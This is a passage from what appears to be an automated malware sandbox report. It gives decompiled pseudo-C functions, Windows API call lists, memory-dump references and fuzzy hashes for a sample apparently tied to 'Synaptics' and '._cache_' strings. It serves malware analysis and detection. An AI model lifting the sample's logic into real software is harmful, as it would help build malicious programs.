                                                                                                                                                                                                                            					_push(_v28);
                                                                                                                                                                                                                            					_push(0x477dc8);
                                                                                                                                                                                                                            					_push("._cache_");
                                                                                                                                                                                                                            					E00402B68(0,  &_v36);
                                                                                                                                                                                                                            					E00409E18(_v36,  &_v32);
                                                                                                                                                                                                                            					_push(_v32);
                                                                                                                                                                                                                            					E00404D40();
                                                                                                                                                                                                                            					_push(_t161);
                                                                                                                                                                                                                            					_push(0x477d03);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t162;
                                                                                                                                                                                                                            					_t65 = E00409A48(_v24, __eflags);
                                                                                                                                                                                                                            					__eflags = _t65;
                                                                                                                                                                                                                            					if(_t65 != 0) {
                                                                                                                                                                                                                            						_t67 = E00474C10(_v24, _t118, _v8, __edi, __esi);
                                                                                                                                                                                                                            						__eflags = _t67;
                                                                                                                                                                                                                            						if(_t67 != 0) {
                                                                                                                                                                                                                            							E00409A90(_v24, 0x80);
                                                                                                                                                                                                                            							E00409BAC(_v24);
                                                                                                                                                                                                                            							E00404BB8( &_v56, _t118);
                                                                                                                                                                                                                            							_t130 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            							_v20 = E0041E0D0(_t130, 1, 0xa, _v56);
                                                                                                                                                                                                                            							_push(_t161);
                                                                                                                                                                                                                            							_push(0x477ca2);
                                                                                                                                                                                                                            							_push( *[fs:eax]);
                                                                                                                                                                                                                            							 *[fs:eax] = _t162;
                                                                                                                                                                                                                            							E0041DD9C(_v20, _t118, _v24, _t158);
                                                                                                                                                                                                                            							_pop(_t153);
                                                                                                                                                                                                                            							 *[fs:eax] = _t153;
                                                                                                                                                                                                                            							E00403BEC(_v20);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404BB8( &_v40, _t118);
                                                                                                                                                                                                                            						_t133 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            						_v20 = E0041E0D0(_t133, 1, 0xa, _v40);
                                                                                                                                                                                                                            						_push(_t161);
                                                                                                                                                                                                                            						_push(0x477bd6);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t162;
                                                                                                                                                                                                                            						E0041DD9C(_v20, _t118, _v24, __edi); // executed
                                                                                                                                                                                                                            						_pop(_t157);
                                                                                                                                                                                                                            						 *[fs:eax] = _t157;
                                                                                                                                                                                                                            						E00403BEC(_v20);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t141);
                                                                                                                                                                                                                            					_pop(_t123);
                                                                                                                                                                                                                            					 *[fs:eax] = _t141;
                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                            					_push(_t161);
                                                                                                                                                                                                                            					_push(0x477d81);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t162;
                                                                                                                                                                                                                            					E00409A90(_v24, 6);
                                                                                                                                                                                                                            					E00472EF0( &_v72, _t118, _t123, __eflags);
                                                                                                                                                                                                                            					E00404DCC(_v72, 0x477de8);
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						E0047475C( &_v80, _t118, _t158, _t159, __eflags);
                                                                                                                                                                                                                            						E00473490(_v12, _t118, _v80, _v24, __eflags, 0, 0);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E0047475C( &_v76, _t118, _t158, _t159, __eflags);
                                                                                                                                                                                                                            						E00473490(_v12, _t118, _v76, _v24, __eflags, 0, _v13); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t145);
                                                                                                                                                                                                                            					 *[fs:eax] = _t145;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v14 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t146);
                                                                                                                                                                                                                            				 *[fs:eax] = _t146;
                                                                                                                                                                                                                            				_push(0x477db5);
                                                                                                                                                                                                                            				E004049E4( &_v80, 0xf);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}
































                                                                                                                                                                                                                            0x00477b27
                                                                                                                                                                                                                            0x00477b32
                                                                                                                                                                                                                            0x00477b39
                                                                                                                                                                                                                            0x00477b3e
                                                                                                                                                                                                                            0x00477b41
                                                                                                                                                                                                                            0x00477b46
                                                                                                                                                                                                                            0x00477b50
                                                                                                                                                                                                                            0x00477b5b
                                                                                                                                                                                                                            0x00477b60
                                                                                                                                                                                                                            0x00477b6b
                                                                                                                                                                                                                            0x00477b72
                                                                                                                                                                                                                            0x00477b73
                                                                                                                                                                                                                            0x00477b78
                                                                                                                                                                                                                            0x00477b7b
                                                                                                                                                                                                                            0x00477b81
                                                                                                                                                                                                                            0x00477b86
                                                                                                                                                                                                                            0x00477b88
                                                                                                                                                                                                                            0x00477c38
                                                                                                                                                                                                                            0x00477c3d
                                                                                                                                                                                                                            0x00477c3f
                                                                                                                                                                                                                            0x00477c4d
                                                                                                                                                                                                                            0x00477c55
                                                                                                                                                                                                                            0x00477c5f
                                                                                                                                                                                                                            0x00477c6a
                                                                                                                                                                                                                            0x00477c7c
                                                                                                                                                                                                                            0x00477c81
                                                                                                                                                                                                                            0x00477c82
                                                                                                                                                                                                                            0x00477c87
                                                                                                                                                                                                                            0x00477c8a
                                                                                                                                                                                                                            0x00477c93
                                                                                                                                                                                                                            0x00477c9a
                                                                                                                                                                                                                            0x00477c9d
                                                                                                                                                                                                                            0x00477cf4
                                                                                                                                                                                                                            0x00477cf4
                                                                                                                                                                                                                            0x00477b8e
                                                                                                                                                                                                                            0x00477b93
                                                                                                                                                                                                                            0x00477b9e
                                                                                                                                                                                                                            0x00477bb0
                                                                                                                                                                                                                            0x00477bb5
                                                                                                                                                                                                                            0x00477bb6
                                                                                                                                                                                                                            0x00477bbb
                                                                                                                                                                                                                            0x00477bbe
                                                                                                                                                                                                                            0x00477bc7
                                                                                                                                                                                                                            0x00477bce
                                                                                                                                                                                                                            0x00477bd1
                                                                                                                                                                                                                            0x00477c28
                                                                                                                                                                                                                            0x00477c28
                                                                                                                                                                                                                            0x00477cfb
                                                                                                                                                                                                                            0x00477cfd
                                                                                                                                                                                                                            0x00477cfe
                                                                                                                                                                                                                            0x00477d0d
                                                                                                                                                                                                                            0x00477d0f
                                                                                                                                                                                                                            0x00477d10
                                                                                                                                                                                                                            0x00477d15
                                                                                                                                                                                                                            0x00477d18
                                                                                                                                                                                                                            0x00477d23
                                                                                                                                                                                                                            0x00477d2b
                                                                                                                                                                                                                            0x00477d38
                                                                                                                                                                                                                            0x00477d3d
                                                                                                                                                                                                                            0x00477d64
                                                                                                                                                                                                                            0x00477d72
                                                                                                                                                                                                                            0x00477d3f
                                                                                                                                                                                                                            0x00477d48
                                                                                                                                                                                                                            0x00477d56
                                                                                                                                                                                                                            0x00477d56
                                                                                                                                                                                                                            0x00477d79
                                                                                                                                                                                                                            0x00477d7c
                                                                                                                                                                                                                            0x00477b29
                                                                                                                                                                                                                            0x00477b29
                                                                                                                                                                                                                            0x00477b29
                                                                                                                                                                                                                            0x00477d8d
                                                                                                                                                                                                                            0x00477d90
                                                                                                                                                                                                                            0x00477d93
                                                                                                                                                                                                                            0x00477da0
                                                                                                                                                                                                                            0x00477dad

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 00477B20
                                                                                                                                                                                                                              • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindModuleNameResource
                                                                                                                                                                                                                            • String ID: ._cache_
                                                                                                                                                                                                                            • API String ID: 938654709-4202169512
                                                                                                                                                                                                                            • Opcode ID: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                                                                                                                                                                                            • Instruction ID: f4b1b61c27c6b3fcd429a4d8c4df21a5758f96423c611e3672b605c149e07d86
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D61D430A042099FDB11EFA5D852AEEB7B9EF49704F60847BF504B7291D739AD01CB68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00478CB0(void* __edx) {
                                                                                                                                                                                                                            				intOrPtr _t3;
                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                            				intOrPtr* _t6;
                                                                                                                                                                                                                            				intOrPtr* _t7;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(_t21);
                                                                                                                                                                                                                            				_push(0x478d26);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t21;
                                                                                                                                                                                                                            				 *0x49ec80 =  *0x49ec80 + 1;
                                                                                                                                                                                                                            				if( *0x49ec80 == 0) {
                                                                                                                                                                                                                            					 *0x49ec84 = 1;
                                                                                                                                                                                                                            					_t3 =  *0x49ec88; // 0x0
                                                                                                                                                                                                                            					E00403BEC(_t3);
                                                                                                                                                                                                                            					_t5 =  *0x49dc9c; // 0x49e020
                                                                                                                                                                                                                            					 *_t5 = 0;
                                                                                                                                                                                                                            					_t6 =  *0x49d7a8; // 0x49e000
                                                                                                                                                                                                                            					 *_t6 = 0;
                                                                                                                                                                                                                            					_t7 =  *0x49dc20; // 0x49e810
                                                                                                                                                                                                                            					 *_t7 = 0;
                                                                                                                                                                                                                            					if( *0x49ec90 != 0) {
                                                                                                                                                                                                                            						L00417DFC(); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t18 =  *0x401094; // 0x401098
                                                                                                                                                                                                                            					E004054C8(0x49c9e8, 5, _t18);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t14);
                                                                                                                                                                                                                            				 *[fs:eax] = _t14;
                                                                                                                                                                                                                            				_push(0x478d2d);
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 7426F460.OLE32(00000000,00478D26), ref: 00478CFE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7426F460
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 3809281208-429267355
                                                                                                                                                                                                                            • Opcode ID: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                                                                                                                                                                                            • Instruction ID: 9009332550508c6597b3b9da99e6bfd18627bf9d89c0e286b3a7dbd72528ea00
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43F0A4706046408FF315DF2AED156567BE5EBA9304B828477E408976B1DE785802CB1C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0040484C() {
                                                                                                                                                                                                                            				struct HINSTANCE__* _t24;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					if( *0x49b004 != 0) {
                                                                                                                                                                                                                            						E00404734();
                                                                                                                                                                                                                            						E004047C0(_t32);
                                                                                                                                                                                                                            						 *0x49b004 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                                                                                                                                                                                            							 *0x0049E644 = 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E004045C4(); // executed
                                                                                                                                                                                                                            						if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                                                                                                                                                                                            							_t14 =  *0x0049E648;
                                                                                                                                                                                                                            							if( *0x0049E648 != 0) {
                                                                                                                                                                                                                            								E0040653C(_t14);
                                                                                                                                                                                                                            								_t35 =  *((intOrPtr*)(0x49e648));
                                                                                                                                                                                                                            								_t7 = _t35 + 0x10; // 0x400000
                                                                                                                                                                                                                            								_t24 =  *_t7;
                                                                                                                                                                                                                            								_t8 = _t35 + 4; // 0x400000
                                                                                                                                                                                                                            								if(_t24 !=  *_t8 && _t24 != 0) {
                                                                                                                                                                                                                            									FreeLibrary(_t24);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E0040459C();
                                                                                                                                                                                                                            						if( *((char*)(0x49e660)) == 1) {
                                                                                                                                                                                                                            							 *0x0049E65C();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((char*)(0x49e660)) != 0) {
                                                                                                                                                                                                                            							E00404790();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *0x49e638 == 0) {
                                                                                                                                                                                                                            							if( *0x49e028 != 0) {
                                                                                                                                                                                                                            								 *0x49e028();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							ExitProcess( *0x49b000); // executed
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                                                                                                                                                                                            						_t45 = _t45 + 0xc;
                                                                                                                                                                                                                            						0x49b000 = 0x49b000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *0x49e048 = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *0x49e048))();
                                                                                                                                                                                                                            					} while ( *0x49e048 != 0);
                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e8
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048f2
                                                                                                                                                                                                                            0x004048fb
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x00404870
                                                                                                                                                                                                                            0x00404874
                                                                                                                                                                                                                            0x00404876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1404682716-0
                                                                                                                                                                                                                            • Opcode ID: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                                                                                                                                                                                            • Instruction ID: 8f7f5b5083db65be3b92a9b52f1338e088dbfa5033c12c2e4b8cbee57b0dbfcd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88217CFA900285AFEB20AF66848475777D1AF89314F24897B9A04A72C6D77CCCD0C75D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00404844() {
                                                                                                                                                                                                                            				intOrPtr* _t13;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t27;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                                                                                                                                                                                                                            				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					if( *0x49b004 != 0) {
                                                                                                                                                                                                                            						E00404734();
                                                                                                                                                                                                                            						E004047C0(_t36);
                                                                                                                                                                                                                            						 *0x49b004 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                                                                                                                                                                                            						 *0x0049E644 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E004045C4(); // executed
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                                                                                                                                                                                            						_t17 =  *0x0049E648;
                                                                                                                                                                                                                            						if( *0x0049E648 != 0) {
                                                                                                                                                                                                                            							E0040653C(_t17);
                                                                                                                                                                                                                            							_t39 =  *((intOrPtr*)(0x49e648));
                                                                                                                                                                                                                            							_t7 = _t39 + 0x10; // 0x400000
                                                                                                                                                                                                                            							_t27 =  *_t7;
                                                                                                                                                                                                                            							_t8 = _t39 + 4; // 0x400000
                                                                                                                                                                                                                            							if(_t27 !=  *_t8 && _t27 != 0) {
                                                                                                                                                                                                                            								FreeLibrary(_t27);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040459C();
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) == 1) {
                                                                                                                                                                                                                            						 *0x0049E65C();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) != 0) {
                                                                                                                                                                                                                            						E00404790();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *0x49e638 == 0) {
                                                                                                                                                                                                                            						if( *0x49e028 != 0) {
                                                                                                                                                                                                                            							 *0x49e028();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						ExitProcess( *0x49b000); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                                                                                                                                                                                            					_t52 = _t52 + 0xc;
                                                                                                                                                                                                                            					0x49b000 = 0x49b000;
                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *0x49e048 = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *0x49e048))();
                                                                                                                                                                                                                            					} while ( *0x49e048 != 0);
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                                                            0x004048e8
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x004048f2
                                                                                                                                                                                                                            0x004048fb
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x00404870
                                                                                                                                                                                                                            0x00404874
                                                                                                                                                                                                                            0x00404876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1404682716-0
                                                                                                                                                                                                                            • Opcode ID: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                                                                                                                                                                                            • Instruction ID: 883b3613692aa30e866907f4332a392e5c305926fac8e5934d264d12186bf84f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F218CF5900285AFEB21AF6684847563BE1AF95314F1488BBDA04A62C6D37CDCD0CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00404848() {
                                                                                                                                                                                                                            				struct HINSTANCE__* _t26;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					if( *0x49b004 != 0) {
                                                                                                                                                                                                                            						E00404734();
                                                                                                                                                                                                                            						E004047C0(_t35);
                                                                                                                                                                                                                            						 *0x49b004 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                                                                                                                                                                                            						 *0x0049E644 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E004045C4(); // executed
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                                                                                                                                                                                            						_t16 =  *0x0049E648;
                                                                                                                                                                                                                            						if( *0x0049E648 != 0) {
                                                                                                                                                                                                                            							E0040653C(_t16);
                                                                                                                                                                                                                            							_t38 =  *((intOrPtr*)(0x49e648));
                                                                                                                                                                                                                            							_t7 = _t38 + 0x10; // 0x400000
                                                                                                                                                                                                                            							_t26 =  *_t7;
                                                                                                                                                                                                                            							_t8 = _t38 + 4; // 0x400000
                                                                                                                                                                                                                            							if(_t26 !=  *_t8 && _t26 != 0) {
                                                                                                                                                                                                                            								FreeLibrary(_t26);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040459C();
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) == 1) {
                                                                                                                                                                                                                            						 *0x0049E65C();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((char*)(0x49e660)) != 0) {
                                                                                                                                                                                                                            						E00404790();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *0x49e638 == 0) {
                                                                                                                                                                                                                            						if( *0x49e028 != 0) {
                                                                                                                                                                                                                            							 *0x49e028();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						ExitProcess( *0x49b000); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                                                                                                                                                                                            					_t51 = _t51 + 0xc;
                                                                                                                                                                                                                            					0x49b000 = 0x49b000;
                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *0x49e048 = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *0x49e048))();
                                                                                                                                                                                                                            					} while ( *0x49e048 != 0);
                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            0x004048f2
                                                                                                                                                                                                                            0x004048fb
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x004048fd
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404906
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404917
                                                                                                                                                                                                                            0x00404919
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x0040486a
                                                                                                                                                                                                                            0x00404870
                                                                                                                                                                                                                            0x00404874
                                                                                                                                                                                                                            0x00404876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040486a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
